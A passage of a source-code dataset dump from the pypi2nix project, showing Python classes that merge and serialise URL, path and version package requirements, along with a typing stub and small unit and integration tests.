Error message was `{message}`\".format(\n marker=environment_markers, message=e.args\n )\n )\n return False\n\n @abstractmethod\n def to_line(self) -> str:\n pass\n\n\n@attrs\nclass UrlRequirement(Requirement):\n _name: str = attrib()\n _url: str = attrib()\n _extras: Set[str] = attrib()\n _environment_markers: Optional[EnvironmentMarker] = attrib()\n _logger: Logger = attrib()\n\n def name(self) -> str:\n return canonicalize_name(self._name)\n\n def extras(self) -> Set[str]:\n return self._extras\n\n def logger(self) -> Logger:\n return self._logger\n\n def add(self, other: Requirement, target_platform: TargetPlatform) -> Requirement:\n if not self.applies_to_target(target_platform):\n return other\n elif not other.applies_to_target(target_platform):\n return self\n elif self.name() != other.name():\n raise IncompatibleRequirements(\n \"Cannot add requirments with different names `{name1}` and `{name2}`\".format(\n name1=self.name(), name2=other.name()\n )\n )\n else:\n if isinstance(other, VersionRequirement):\n return self\n elif isinstance(other, PathRequirement):\n raise IncompatibleRequirements(\n \"Cannot combine requirements with with url `{url}` and path `{path}`\".format(\n url=self.url, path=other.path\n )\n )\n elif isinstance(other, UrlRequirement):\n if self.url != other.url:\n raise IncompatibleRequirements(\n \"Cannot combine requirements with different urls `{url1}` and `{url2}`\".format(\n url1=self.url, url2=other.url\n )\n )\n else:\n return self\n else:\n raise IncompatibleRequirements(\n \"Did not recognize requirement type of {}\".format(other)\n )\n\n def source(self) -> PackageSource:\n if self._url.startswith(\"git+\"):\n return self._handle_git_source(self._url[4:])\n elif self._url.startswith(\"git://\"):\n return self._handle_git_source(self._url)\n elif self._url.startswith(\"hg+\"):\n return self._handle_hg_source(self._url[3:])\n elif self.url_scheme() == \"file\":\n return PathSource(path=self.url_path())\n else:\n return UrlSource(url=self._url, logger=self._logger)\n\n def environment_markers(self) -> Optional[EnvironmentMarker]:\n return self._environment_markers\n\n def _handle_hg_source(self, url: str) -> HgSource:\n try:\n url, rev = url.split(\"@\")\n except ValueError:\n return HgSource(url=url, logger=self._logger)\n else:\n return HgSource(url=url, revision=rev, logger=self._logger)\n\n def _handle_git_source(self, url: str) -> GitSource:\n try:\n url, rev = url.split(\"@\")\n except ValueError:\n return GitSource(url=url)\n else:\n return GitSource(url=url, revision=rev)\n\n def to_line(self) -> str:\n extras = \"[\" + \",\".join(self.extras()) + \"]\" if self.extras() else \"\"\n return \"{url}#egg={name}{extras}\".format(\n url=self._url, name=self.name(), extras=extras\n )\n\n def url(self) -> str:\n return self._url\n\n def url_scheme(self) -> str:\n url = urlparse(self.url())\n return url.scheme\n\n def url_path(self) -> str:\n url = urlparse(self.url())\n return url.path\n\n\n@attrs\nclass PathRequirement(Requirement):\n _name: str = attrib()\n _path: str = attrib()\n _extras: Set[str] = attrib()\n _environment_markers: Optional[EnvironmentMarker] = attrib()\n _logger: Logger = attrib()\n\n def name(self) -> str:\n return canonicalize_name(self._name)\n\n def extras(self) -> Set[str]:\n return self._extras\n\n def logger(self) -> Logger:\n return self._logger\n\n def add(self, other: Requirement, target_platform: TargetPlatform) -> Requirement:\n if not self.applies_to_target(target_platform):\n return other\n elif not 
other.applies_to_target(target_platform):\n return self\n elif self.name() != other.name():\n raise IncompatibleRequirements(\n \"Cannot add requirements with different names `{name1}` and `{name2}`\".format(\n name1=self.name(), name2=other.name()\n )\n )\n else:\n if isinstance(other, VersionRequirement):\n return self\n elif isinstance(other, UrlRequirement):\n raise IncompatibleRequirements(\n \"Cannot combine requirements with path `{path} and url `{url}`\".format(\n path=self.path, url=other.url\n )\n )\n elif isinstance(other, PathRequirement):\n if self.path != other.path:\n raise IncompatibleRequirements(\n \"Cannot combine requirements with different paths `{path1}` and `{path2}`\".format(\n path1=self.path, path2=other.path\n )\n )\n else:\n return self\n else:\n raise IncompatibleRequirements(\n \"Did not recognize requirement type of {}\".format(other)\n )\n\n def source(self) -> PathSource:\n return PathSource(path=self._path)\n\n def environment_markers(self) -> Optional[EnvironmentMarker]:\n return self._environment_markers\n\n def to_line(self) -> str:\n extras = \"[\" + \",\".join(self.extras()) + \"]\" if self.extras() else \"\"\n return \"file://{path}#egg={name}{extras}\".format(\n path=self._path, extras=extras, name=self.name()\n )\n\n def path(self) -> str:\n return self._path\n\n def change_path(self, mapping: Callable[[str], str]) -> \"PathRequirement\":\n return evolve(self, path=mapping(self._path))\n\n\n@attrs\nclass VersionRequirement(Requirement):\n _name: str = attrib()\n _versions: List[Tuple[str, str]] = attrib()\n _extras: Set[str] = attrib()\n _environment_markers: Optional[EnvironmentMarker] = attrib()\n _logger: Logger = attrib()\n\n def name(self) -> str:\n return canonicalize_name(self._name)\n\n def extras(self) -> Set[str]:\n return self._extras\n\n def logger(self) -> Logger:\n return self._logger\n\n def add(self, other: Requirement, target_platform: TargetPlatform) -> Requirement:\n if not self.applies_to_target(target_platform):\n return other\n elif not other.applies_to_target(target_platform):\n return self\n elif self.name() != other.name():\n raise IncompatibleRequirements(\n \"Cannot add requirments with different names `{name1}` and `{name2}`\".format(\n name1=self.name(), name2=other.name()\n )\n )\n else:\n if isinstance(other, PathRequirement):\n return other\n elif isinstance(other, UrlRequirement):\n return other\n elif isinstance(other, VersionRequirement):\n return VersionRequirement(\n name=self.name(),\n extras=self._extras.union(other._extras),\n versions=self.version() + other.version(),\n environment_markers=None,\n logger=self.logger(),\n )\n else:\n raise IncompatibleRequirements(\n \"Did not recognize requirement type of {}\".format(other)\n )\n\n def source(self) -> None:\n return None\n\n def environment_markers(self) -> Optional[EnvironmentMarker]:\n return self._environment_markers\n\n def version(self) -> List[Tuple[str, str]]:\n return self._versions\n\n def to_line(self) -> str:\n version = \", \".join(\n [\n \"{operator} {specifier}\".format(operator=operator, specifier=specifier)\n for operator, specifier in self._versions\n ]\n )\n extras = (\n \"[{extras}]\".format(extras=\",\".join(self.extras())) if self.extras() else \"\"\n )\n return \"{name}{extras} {version}\".format(\n name=self._name, version=version, extras=extras\n )\n" }, { "alpha_fraction": 0.688829779624939, "alphanum_fraction": 0.688829779624939, "avg_line_length": 30.33333396911621, "blob_id": "486cfb86a66e6f89c293ed0e2541160b5819f43c", 
"content_id": "918d70604f38b6e499b38f9629c77cba0603eb70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 376, "license_type": "no_license", "max_line_length": 80, "num_lines": 12, "path": "/mypy/packaging/markers.pyi", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Dict\nfrom typing import Optional\n\ndef default_environment() -> Dict[str, str]: ...\n\nclass Marker:\n def __init__(self, marker: str) -> None: ...\n def evaluate(self, environment: Optional[Dict[str, str]] = ...) -> bool: ...\n\nclass InvalidMarker(ValueError): ...\nclass UndefinedComparison(ValueError): ...\nclass UndefinedEnvironmentName(ValueError): ...\n" }, { "alpha_fraction": 0.7110884785652161, "alphanum_fraction": 0.7161749601364136, "avg_line_length": 21.86046600341797, "blob_id": "842849243c95e225483b6a485ffbbb73d0382a94", "content_id": "953a0f8289fb325de9f1e4b905d6aff44889a77b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 983, "license_type": "permissive", "max_line_length": 62, "num_lines": 43, "path": "/unittests/test_sources.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.sources import Sources\n\n\n@pytest.fixture\ndef sources():\n return Sources()\n\n\n@pytest.fixture\ndef other_sources():\n return Sources()\n\n\ndef test_sources_can_be_added_to(sources):\n sources.add(\"testsource\", PathSource(\"/test/path\"))\n\n assert \"testsource\" in sources\n\n\ndef test_sources_can_be_queried_by_name(sources):\n source = PathSource(\"/test/path\")\n sources.add(\"testsource\", source)\n\n assert sources[\"testsource\"] is source\n\n\ndef test_sources_can_be_merged(sources, other_sources):\n assert \"testsource\" not in sources\n other_sources.add(\"testsource\", PathSource(\"/test/path\"))\n sources.update(other_sources)\n assert \"testsource\" in sources\n\n\ndef test_items_returns_length_on_tuple_for_one_entry(sources):\n sources.add(\"testitem\", PathSource(\"/test/path\"))\n assert len(sources.items()) == 1\n\n\ndef test_empty_sources_has_length_0(sources):\n assert len(sources) == 0\n" }, { "alpha_fraction": 0.7352941036224365, "alphanum_fraction": 0.7352941036224365, "avg_line_length": 21.66666603088379, "blob_id": "5da7e8e2369be4b8aee1105faf9ba9d43a2b99b9", "content_id": "305d1a56e98588d35097b86b906607e9c0817814", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 136, "license_type": "no_license", "max_line_length": 38, "num_lines": 6, "path": "/integrationtests/test_flit.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass FlitTestCase(IntegrationTest):\n name_of_testcase = \"flit\"\n requirements = [\"flit\"]\n" }, { "alpha_fraction": 0.7052023410797119, "alphanum_fraction": 0.7052023410797119, "avg_line_length": 23.714284896850586, "blob_id": "6625ae080f7e34c0110642e81ed2ad01d4a3b4ca", "content_id": "9487fc8bd6c8abc7d4bcac14acce29cd613b5343", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 173, "license_type": "no_license", "max_line_length": 38, "num_lines": 7, "path": "/integrationtests/test_empy.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass EmpyTestCase(IntegrationTest):\n 
name_of_testcase = \"empy\"\n code_for_testing = [\"import em\"]\n requirements = [\"empy\"]\n" }, { "alpha_fraction": 0.6495097875595093, "alphanum_fraction": 0.718137264251709, "avg_line_length": 28.14285659790039, "blob_id": "1fec46378a26b00d9937c233e746736afa0b35dc", "content_id": "1c5a720c360bf440baf1da45e3bee47a871c0aad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 408, "license_type": "no_license", "max_line_length": 79, "num_lines": 14, "path": "/integrationtests/test_tornado.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\nREVISION = \"69253c820df473407c562a227d0ba36df25018ab\"\n\n\nclass TornadoTestCase(IntegrationTest):\n name_of_testcase = \"tornado\"\n code_for_testing = [\"import tornado\"]\n requirements = [\n \"-e git+git://github.com/tornadoweb/tornado.git@69253c820df473407c562a227d0ba36df25018ab#egg=tornado\"\n ]\n\n def requirements_file_check(self, content):\n self.assertIn(REVISION, content)\n" } ]
140
thanhtran18/AdaBoost
https://github.com/thanhtran18/AdaBoost
ee35f4db3766fe2cf3605cee5fdc6d418d672ebb
fd543a6a07d52dd0c61fe613f6b21da5538a4c6f
29dc10a2cedef6edf9694a701f7e75fff8a1b430
refs/heads/master
2020-04-30T19:44:24.563290
2019-03-26T15:58:52
2019-03-26T15:58:52
177,047,244
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5903670787811279, "alphanum_fraction": 0.6050970554351807, "avg_line_length": 30.218978881835938, "blob_id": "022f89b4d4437f63ee4981245c09ef393314ce19", "content_id": "a3b248847fa4bffdd9a3681456e3e70526511b3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4277, "license_type": "no_license", "max_line_length": 105, "num_lines": 137, "path": "/utils.py", "repo_name": "thanhtran18/AdaBoost", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.io import *\nimport matplotlib.pyplot as plt\n\n\ndef findWeakLearner(X, t, weights):\n # Fine the best weaker learner given data, targets, and weights.\n # weakl learner is a decision stump, p x(d) > p theta\n #\n # X is n-by-m-by-N\n # t is N-by-1\n # weight is N-by-1\n # d is 1-by-2 (index into 2-D matrix)\n # p is +/- 1\n # theta is scale\n # correct is N-by-1, binary. correct[i]=1 iff this weak learner correctly classifies example X[:,:,i]\n\n N = X.shape[2]\n\n t = np.squeeze(t)\n weights = np.squeeze(weights)\n\n # Sort all coordinates of X\n sinds = np.argsort(X) # sort based on last column\n Xs = np.sort(X)\n\n # Sort target vales according to this data sort\n Ts = t[sinds]\n\n # Sort weight values according to this data sort\n Ws = weights[sinds]\n\n # Compute cumsum to evalute goodness of possible thresholds theta.\n # cweight_pos[i,j,k] is amount of correct - incorrect weight incurred on left\n # side of threshold at (Xs[i,j,k]+Xs[i,j,k+1])/2\n cweight_pos = np.cumsum(Ts * Ws, 2)\n\n # Do same in reverse (total -)\n # cwiehgt_neg[i,j,k] is amount of correct - incorrect weight incurred on right\n # side of threshold at (Xs[i,j,k]+Xs[i,j,k+1])/2\n cweight_neg = np.expand_dims(cweight_pos[:, :, -1], 2) - cweight_pos\n\n # Max of either +1/1 times sum of two.\n signed_cor = cweight_pos - cweight_neg\n # Locations where Xs[i,j,k]==Xs[i,j,k+1] are not valid as possible threshold locations\n # Set these to zero so that we do not find thme as maxima\n valid = (np.diff(Xs, 1, 2) != 0)\n signed_cor = signed_cor * np.concatenate((valid, np.zeros((X.shape[0], X.shape[1], 1))), 2)\n\n us_cor = np.abs(signed_cor)\n\n i, j, k = np.unravel_index(np.argmax(us_cor), signed_cor.shape)\n\n # Compute theta, check boundary cayse\n if k == N - 1:\n theta = np.inf\n else:\n theta = (Xs[i, j, k] + Xs[i, j, k + 1]) / 2\n\n # The feature is i,j\n d = [i, j]\n\n # Check whether it was a +max or |-max| to get partity p\n p = -np.sign(signed_cor[i, j, k])\n\n # Whether or not this weak learner classifies examples correctly\n tmp = p * X[i, j, :] > p * theta\n correct = (t * (tmp - 0.5)) > 0\n\n return d, p, theta, correct\n\n\ndef evaluateClassifier(classifier, x, t):\n # Evaluate classifer on data\n #\n # classifier is a map of alpha,d,p,theta arrays of length M\n # x is n-by-m-by-N, data\n # t is N-by-1, ground truth\n # errs is vector of length M\n #\n # errs[i] is error of classifier using first i components of committee in classifier\n\n M = len(classifier['alpha'])\n N = x.shape[2]\n\n # Responses f inputs to each classifier in committee\n resps = np.zeros((N, M))\n for m in range(M):\n x_use = x[classifier['d'][m, 0], classifier['d'][m, 1], :]\n resps[:, m] = classifier['alpha'][m] * np.sign(\n (classifier['p'][m] * x_use > classifier['p'][m] * classifier['theta'][m]) - 0.5)\n\n # Compute output of classifier using first i components using cumsum\n class_out = np.sign(np.cumsum(resps, 1))\n\n # Compare classifier output to ground-truth t\n correct = (class_out * 
np.reshape(t, (N, 1))) > 0\n\n errs = 1 - np.mean(correct, 0)\n\n return errs\n\n\ndef visualizeClassifier(classifier, fig_num, im_size):\n # Visualize a classifier\n # Color negative and positive pixels by sum of alpha values\n\n pos_feat = np.zeros(im_size)\n neg_feat = np.zeros(im_size)\n for m in range(len(classifier['alpha'])):\n if classifier['p'][m] > 0:\n pos_feat[classifier['d'][m, 0], classifier['d'][m, 1]] += classifier['alpha'][m]\n else:\n neg_feat[classifier['d'][m, 0], classifier['d'][m, 1]] += classifier['alpha'][m]\n\n plt.figure(fig_num)\n plt.subplot(121)\n plt.imshow(pos_feat, cmap='gray')\n plt.title('Sum of weights on p=1 features')\n\n plt.subplot(122)\n plt.imshow(neg_feat, cmap='gray')\n plt.title('Sum of weights on p=-1 features')\n plt.show()\n\n\nif __name__ == \"__main__\":\n N = 5\n X = np.random.random((10, 20, N))\n t = np.random.random((N, 1))\n weights = np.random.random((N, 1))\n\n d, p, theta, correct = findWeakLearner(X, t, weights)\n print(d)\n print(p)\n print(theta)\n print(correct)\n" }, { "alpha_fraction": 0.6021955013275146, "alphanum_fraction": 0.63774174451828, "avg_line_length": 23.5256404876709, "blob_id": "430d37a3dcdcff38e9ebc8b762ef7521915513b8", "content_id": "0cebfe2ce3ada18d429f2b32ed771056f2d9351b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1913, "license_type": "no_license", "max_line_length": 100, "num_lines": 78, "path": "/boost_digits.py", "repo_name": "thanhtran18/AdaBoost", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.io import *\nimport matplotlib.pyplot as plt\nfrom utils import *\n\n# boosting for recognizing MNIST digits\n\n# Load the data X and labels t\ndata = loadmat('digits.mat')\nX, t = data['X'], data['t']\nt = t.astype(int)\n\n# X is 28x28x1000, t is 1000x1\n# Each X[:,:,i] os a 28x28 image\n\n# Subsample images to be 14x14 for speed\nX = X[::2, ::2, :]\n\n# Set up target values\n# 4s are class +1, all others are class -1\nf4 = (t == 4)\nn4 = (t != 4)\nt[f4] = 1\nt[n4] = -1\n\n# 14,14,1000\nnx, ny, ndata = X.shape\n\n# Number to use as training images\nntrain = 500\n\n# Training and test images\nX_train = X[:, :, :ntrain]\nt_train = t[:ntrain]\nX_test = X[:, :, ntrain:]\nt_test = t[ntrain:]\n\n# Boosting code goes here\nniter = 100\n\n# Initialize the weights\nweights = np.ones((1, ntrain)) / ntrain\nclassifier = {'alpha': np.zeros(niter), 'd': np.zeros((niter, 2)).astype(int), 'p': np.zeros(niter),\n 'theta': np.zeros(niter)}\n\nfor iter in range(niter):\n # Find the best weak learner\n d, p, theta, correct = findWeakLearner(X_train, t_train, weights)\n\n # alpha = 0\n err = weights @ (1 - correct) / weights.sum()\n if err > 0.5:\n break\n # alpha = 0\n alpha = np.log((1 - err) / (err + np.spacing(1)))\n\n weights = weights * np.exp(alpha.reshape(1, 1) @ (1 - correct).reshape(1, 500))\n weights = weights/weights.sum()\n\n classifier['alpha'][iter] = alpha\n classifier['d'][iter, :] = d\n classifier['p'][iter] = p\n classifier['theta'][iter] = theta\n\n# Show plots of training error and test error\n\ntrain_errs = evaluateClassifier(classifier, X_train, t_train)\ntest_errs = evaluateClassifier(classifier, X_test, t_test)\n\nplt.figure(1)\nplt.rcParams['font.size'] = 20\nplt.plot(train_errs, 'r-')\nplt.plot(test_errs, 'b-')\nplt.xlabel('Number of iterations')\nplt.ylabel('Error')\nplt.legend(['Training error', 'Test error'])\n\nvisualizeClassifier(classifier, 2, (nx, ny))\n" } ]
2
yxc0103de/spektralmagi
https://github.com/yxc0103de/spektralmagi
ded4696eed3a0455ca71de17b500dda05d9c4299
a538d17c9c4da1232002cc7a1718fe5415aee50b
6afdf1769f8e898c500cfc49da089ae387cad2e2
refs/heads/master
2022-05-28T19:09:45.627318
2020-05-03T09:55:35
2020-05-03T09:55:35
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.570684552192688, "alphanum_fraction": 0.6104910969734192, "avg_line_length": 21.214876174926758, "blob_id": "a7a733c4ee7faac8ff8d28d61839385307045d88", "content_id": "1120cc40b4571525efde5b76f12160ebb3a33329", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2688, "license_type": "no_license", "max_line_length": 102, "num_lines": 121, "path": "/erik/test2.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport pyaudio\nimport struct\nimport numpy as np\nimport pysptk.sptk as sptk\nimport time\nfrom datetime import datetime\n\nFORMAT = pyaudio.paInt16\nCHANNELS = 1\nRATE = 48000\nCHUNK = 13000 #int(wlen*RATE) 13000\nwlen = float(CHUNK/RATE)\n\np = pyaudio.PyAudio()\n\nchosen_device_index = -1\nfor x in range(0,p.get_device_count()):\n info = p.get_device_info_by_index(x)\n print(p.get_device_info_by_index(x))\n if info[\"name\"] == 'Built-in Microphone':\n chosen_device_index = info[\"index\"]\n print(\"Chosen index: \", chosen_device_index)\n\nstream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input_device_index=chosen_device_index,\n input=True,\n output=True,\n frames_per_buffer=CHUNK\n )\n\n\n# data = stream.read(CHUNK)\n# data_int16 = struct.unpack(str(CHUNK) + 'h', data)\n\n# draw the figure so the animations will work\nfig = plt.gcf()\nfig.show()\nfig.canvas.draw()\n\nt = np.linspace(-10,0,num=10*RATE)\nsound = np.zeros(10*RATE)\ndt = int(wlen/10*RATE)\npitch = np.zeros(int(10/dt*RATE))\ntp = np.linspace(-10,0,num=len(pitch))\n\nprint(\"Start loop\")\n#time.sleep(2)\n\n\nwhile True:\n\n # compute something\n t0 = time.process_time()\n data = np.array(struct.unpack(str(CHUNK) + 'h', stream.read(CHUNK,exception_on_overflow = False)))\n t1 = time.process_time()\n # print('53',t1-t0)\n\n data = data.astype('float64')\n sound = np.roll(sound,-len(data))\n\n p = sptk.swipe(data,RATE,dt,min=50,max=500,threshold=0.3)\n t2 = time.process_time()\n # print('60',t2-t1)\n # print(len(sound))\n pitch = np.roll(pitch,-len(p))\n # print(len(p))\n # print(len(pitch))\n\n\n # print(CHUNK)\n # print(data)\n\n now = datetime.now()\n current_time = now.strftime(\"%H:%M:%S\")\n print(current_time + \" \" + str(p))\n\n\n # print(\"Pitch: \" + str(pitch))\n\n np.put(sound,range(-len(data),-1),data)\n np.put(pitch,range(-len(p),-1),p)\n t10 = time.process_time()\n # print('75',t10-t2)\n plt.figure(1)\n plt.clf()\n t3 = time.process_time()\n # print('78',t3-t10)\n plt.plot(t,sound) # plot something\n t4 = time.process_time()\n # print('81',t4-t3)\n #\n # plt.pause(0.001) # I ain't needed!!!\n # fig.canvas.draw()\n #\n plt.figure(2)\n plt.clf()\n plt.plot(tp,pitch,'.') # plot something\n\n\n plt.pause(0.005) # I ain't needed!!!\n t5 = time.process_time()\n # print('93',t5-t4)\n fig.canvas.draw()\n # print(time.process_time()-t5)\n\n\n\n # plt.figure(2)\n # plt.clf()\n # plt.plot(tp,pitch,'.')\n # plt.pause(0.005) # I ain't needed!!!\n # fig.canvas.draw()\n\n # update canvas immediately\n #plt.xlim([0, 100])\n #plt.ylim([0, 1000])\n\n # print(data)\n" }, { "alpha_fraction": 0.5483061671257019, "alphanum_fraction": 0.589962363243103, "avg_line_length": 31.933883666992188, "blob_id": "19e06443f69d11edd0b22b909282113fa07f5cb4", "content_id": "76d77e275ca80ce4761fcb352a19e81df89d8321", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3985, "license_type": "no_license", "max_line_length": 121, 
"num_lines": 121, "path": "/python/testpy/wpyqtgr.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport pyqtgraph as pg\n\nimport struct\nimport pyaudio\nfrom scipy.fftpack import fft\n\nimport sys\nimport time\n\nfrom pysptk.sptk import swipe\n\n\nclass AudioStream(object):\n def __init__(self):\n\n # pyqtgraph stuff\n pg.setConfigOptions(antialias=True)\n self.traces = dict()\n self.app = QtGui.QApplication(sys.argv)\n self.win = pg.GraphicsWindow(title='Spectrum Analyzer')\n self.win.setWindowTitle('Spectrum Analyzer')\n self.win.setGeometry(5, 115, 900, 500)\n\n wf_xlabels = [(0, '0'), (2048, '2048'), (4096, '4096')]\n wf_xaxis = pg.AxisItem(orientation='bottom')\n wf_xaxis.setTicks([wf_xlabels])\n\n wf_ylabels = [(0, '0'), (127, '128'), (255, '255')]\n wf_yaxis = pg.AxisItem(orientation='left')\n wf_yaxis.setTicks([wf_ylabels])\n\n sp_xlabels = [\n (np.log10(10), '10'), (np.log10(100), '100'),\n (np.log10(1000), '1000'), (np.log10(22050), '22050')\n ]\n sp_xaxis = pg.AxisItem(orientation='bottom')\n sp_xaxis.setTicks([sp_xlabels])\n\n self.waveform = self.win.addPlot(\n title='Sound', row=1, col=1, axisItems={'bottom': wf_xaxis, 'left': wf_yaxis},\n )\n self.spectrum = self.win.addPlot(\n title='Swipe', pen=None, symbol='o', row=2, col=1, axisItems={'bottom': sp_xaxis},\n )\n # self.scatter = pg.ScatterPlotItem(pen=pg.mkPen(width=5, color='r'), symbol='o', size=1)\n # self.spectrum = self.win.addItem(self.scatter)\n\n self.loop = 0.2\n # pyaudio stuff\n self.FORMAT = pyaudio.paInt16\n self.CHANNELS = 1\n self.RATE = 44100\n self.CHUNK = int(self.loop*self.RATE)\n\n self.traces['sound'] = self.waveform.plot(pen='c', width=3)\n self.waveform.setYRange(-7000, 7000, padding=0)\n self.waveform.setXRange(-10, 0, padding=0.005)\n\n symb = QtGui.QPainterPath()\n symb.addRect(QtCore.QRectF(-0.0, -0.5, 1, 1))\n # self.traces['swipe'] = self.spectrum.plot([], pen=None,\n # symbolBrush=(255,0,0), symbolSize=5, symbolPen=None)\n self.traces['swipe'] = self.spectrum.ScatterPlotItem()\n self.spectrum.setYRange(0, 700, padding=0)\n self.spectrum.setXRange(-10, 0, padding=0.005)\n\n self.p = pyaudio.PyAudio()\n self.stream = self.p.open(\n format=self.FORMAT,\n channels=self.CHANNELS,\n rate=self.RATE,\n input=True,\n output=True,\n frames_per_buffer=self.CHUNK,\n )\n # waveform and spectrum x points\n\n self.t = np.linspace(-10,0,num=10*self.RATE)\n self.sound = np.zeros(10*self.RATE)\n self.dt = int(self.loop/10*self.RATE)\n self.pitch = np.zeros(int(10/self.dt*self.RATE))\n self.tp = np.linspace(-10,0,num=len(self.pitch))\n\n def start(self):\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtGui.QApplication.instance().exec_()\n\n def set_plotdata(self):\n self.traces['sound'].setData(self.t, self.sound)\n # self.traces['swipe'].setData(self.tp, self.pitch)\n self.traces['swipe'].setData(self.tp,self.pitch)\n\n def update(self):\n\n data = np.array(struct.unpack(str(self.CHUNK) + 'h', self.stream.read(self.CHUNK,exception_on_overflow = False)))\n data = data.astype('float64')\n self.sound = np.roll(self.sound,-len(data))\n\n sw = swipe(data,self.RATE,self.dt,min=40,max=700,threshold=0.25)\n\n self.pitch = np.roll(self.pitch,-len(sw))\n\n np.put(self.sound,range(-len(data),-1),data)\n np.put(self.pitch,range(-len(sw),-1),sw)\n\n self.set_plotdata()\n\n\n def animation(self):\n timer = QtCore.QTimer()\n timer.timeout.connect(self.update)\n timer.start(self.loop*1000)\n 
self.start()\n\n\nif __name__ == '__main__':\n\n audio_app = AudioStream()\n audio_app.animation()\n" }, { "alpha_fraction": 0.5348691344261169, "alphanum_fraction": 0.5557122826576233, "avg_line_length": 30.74626922607422, "blob_id": "81f6e3ec5c6c810e177b7ac5cf1a7a5f4dacef40", "content_id": "9ad1d1a250e469d9e30201b34d690c3bcbb4760a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6381, "license_type": "no_license", "max_line_length": 90, "num_lines": 201, "path": "/python/test4_wgrid.py", "repo_name": "yxc0103de/spektralmagi", "src_encoding": "UTF-8", "text": "# plotting\nfrom PyQt5 import QtCore, QtWidgets\nimport pyqtgraph as pg\n\n#\n#import struct\nimport pyaudio\nimport sys\nimport time\n\nimport multiprocessing as mp\nimport queue\n\nfrom pysptk.sptk import swipe\nimport numpy as np\nimport math\n\nclass RTSwipe:\n def __init__(self,RATE=44800,CHUNK=6000,minfreq=50,maxfreq=1500,threshold=0.25):\n self.minfreq=minfreq\n self.maxfreq=maxfreq\n self.threshold=threshold\n\n\n\n CHANNELS = 1\n self.RATE = RATE\n self.CHUNK = CHUNK#2*2048\n self.swipesPerChunk = math.floor(CHUNK/(RATE*0.02)) # 20 ms per swipe estimate\n FORMAT = pyaudio.paInt16\n self.cnt = 0\n tsave = 10\n\n self.t0 = time.time()\n self.t = self.t0\n\n self.sound = mp.Queue()\n self.times = mp.Queue()\n self.swipes = mp.Queue()\n self.shutDown = mp.Queue()\n\n self.audio= pyaudio.PyAudio()\n self.stream = self.audio.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=self.RATE,\n input=True,\n output=False,\n stream_callback=self.audioCallback,\n frames_per_buffer=self.CHUNK\n )\n self.process = mp.Process(target=self.swipeSound)\n self.process.start()\n\n print(\"Process started\")\n\n def audioCallback(self, in_data, frame_count, time_info, status):\n #print('in callback')\n sound = np.frombuffer(in_data,dtype=np.int16)\n times = np.linspace(self.t-self.t0,time.time()-self.t0,\n self.swipesPerChunk,True)\n self.t = time.time()\n self.sound.put(sound)\n self.times.put(times)\n #print(\"Sound len: \" + str(len(sound)))\n return(in_data,pyaudio.paContinue)\n\n def swipeSound(self):\n while True:\n if not self.shutDown.empty():\n break\n try:\n data = self.sound.get_nowait()\n except queue.Empty:\n #print('queue empty')\n time.sleep(0.04)\n else:\n #print(self.sound.empty())\n # self.cnt = 0\n #print('Data length: ', len(data))\n data = data.astype('float64')\n #print(len(data))\n t0 = time.perf_counter()\n sw = swipe(data, self.RATE, int(self.CHUNK/self.swipesPerChunk),\n min=self.minfreq, max=self.maxfreq,\n threshold=self.threshold)\n #print('swipe time: ', time.perf_counter()-t0)\n self.swipes.put(sw)\n #print('swipe length: ', len(sw))\n return True\n\n\n def getSwipes(self):\n if not self.swipes.empty():\n swipes = self.swipes.get_nowait()\n times = self.times.get_nowait()\n newSwipes = []\n newTimes = []\n for i in range(0,len(swipes)):\n if swipes[i] > 0:\n newSwipes.append(np.log(swipes[i])/np.log(2**(1/12)))\n newTimes.append(times[i])\n return newSwipes, newTimes\n return [], []\n\n def exitHandler(self):\n print('in exit')\n self.audio.close(self.stream)\n self.shutDown.put(True)\n self.process.join()\n\nclass RollWindow(pg.GraphicsWindow):\n def __init__(self,sweeper,parent=None,updateInterval=20,timeWindow=10):\n super().__init__(parent=parent)\n self.sweeper = sweeper\n self.updateInterval = updateInterval\n self.timeWindow = timeWindow\n self.t0 = time.time()\n self.t = 0\n self.mainLayout = QtWidgets.QVBoxLayout()\n 
